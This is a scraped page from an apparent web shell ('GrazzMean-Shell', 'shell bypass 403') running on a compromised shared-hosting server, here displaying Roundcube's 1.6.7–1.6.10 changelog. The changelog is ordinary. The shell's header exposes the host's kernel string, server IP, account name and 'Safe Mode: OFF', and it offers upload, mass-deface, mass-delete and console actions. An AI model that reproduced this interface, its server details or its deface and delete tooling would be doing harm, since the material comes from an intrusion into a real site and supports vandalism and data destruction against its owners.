shell bypass 403

GrazzMean-Shell Shell

: /proc/self/root/var/softaculous/roundcube/ [ drwxr-xr-x ]
Uname: Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.213.251.212
Your Ip: 3.15.20.178
User: allssztx (535) | Group: allssztx (533)
Safe Mode: OFF
Disable Function:
NONE
upload mass deface mass delete console

name : changelog.txt 
## Release 1.6.10

- IMAP: Partial support for ANNOTATE-EXPERIMENT-1 extension (RFC 5257)
- OAuth: Support standard authentication with short-living password received with OIDC token (#9530)
- Fix PHP warnings (#9616, #9611)
- Fix whitespace handling in vCard line continuation (#9637)
- Fix current script state after initial scripts creation in managesieve_kolab_master mode
- Fix rcube_imap::get_vendor() result (and PHP warning) on Zimbra server (#9650)
- Fix regression causing inline SVG images to be missing in mail preview (#9644)
- Fix plugin "virtuser_file" to handle backward slashes in username (#9668)
- Fix PHP fatal error when parsing some malformed BODYSTRUCTURE responses (#9689)
- Fix insert_or_update() and reading database server config on PostgreSQL (#9710)
- Fix Oauth issues with use_secure_urls=true (#9722)
- Fix handling of binary mail parts (e.g. PDF) encoded with quoted-printable (#9728)
- Fix links in comments and config to https:// where available (#9759, #9756)
- Fix decoding of attachment names encoded using both RFC2231 and RFC2047 standards (#9725)

## Release 1.6.9

- Fix regression where printing/scaling/rotating image attachments was broken (#9571)
- Fix regression where HTML messages were displayed unstyled (#9586)

## Release 1.6.8

- Managesieve: Protect special scripts in managesieve_kolab_master mode
- Fix newmail_notifier notification focus in Chrome (#9467)
- Fix fatal error when parsing some TNEF attachments (#9462)
- Fix double scrollbar when composing a mail with many plain text lines (#7760)
- Fix decoding mail parts with multiple base64-encoded text blocks (#9290)
- Fix bug where some messages could get malformed in an import from a MBOX file (#9510)
- Fix invalid line break characters in multi-line text in Sieve scripts (#9543)
- Fix bug where "with attachment" filter could fail on some fts engines (#9514)
- Fix bug where an unhandled exception was caused by an invalid image attachment (#9475)
- Fix bug where a long subject title could not be displayed in some cases (#9416)
- Fix infinite loop when parsing malformed Sieve script (#9562)
- Fix bug where imap_conn_option's 'socket' was ignored (#9566)
- Fix XSS vulnerability in post-processing of sanitized HTML content [CVE-2024-42009]
- Fix XSS vulnerability in serving of attachments other than HTML or SVG [CVE-2024-42008]
- Fix information leak (access to remote content) via insufficient CSS filtering [CVE-2024-42010]

## Release 1.6.7

- Makefile: Use phpDocumentor v3.4 for the Framework docs (#9313)
- Fix bug where HTML entities in URLs were not decoded on HTML to plain text conversion (#9312)
- Fix bug in collapsing/expanding folders with some special characters in names (#9324)
- Fix PHP8 warnings (#9363, #9365, #9429)
- Fix missing field labels in CSV import, for some locales (#9393)
- Fix command injection via crafted im_convert_path/im_identify_path on Windows
- Fix cross-site scripting (XSS) vulnerability in handling list columns from user preferences
- Fix cross-site scripting (XSS) vulnerability in handling SVG animate attributes
© 2025 GrazzMean-Shell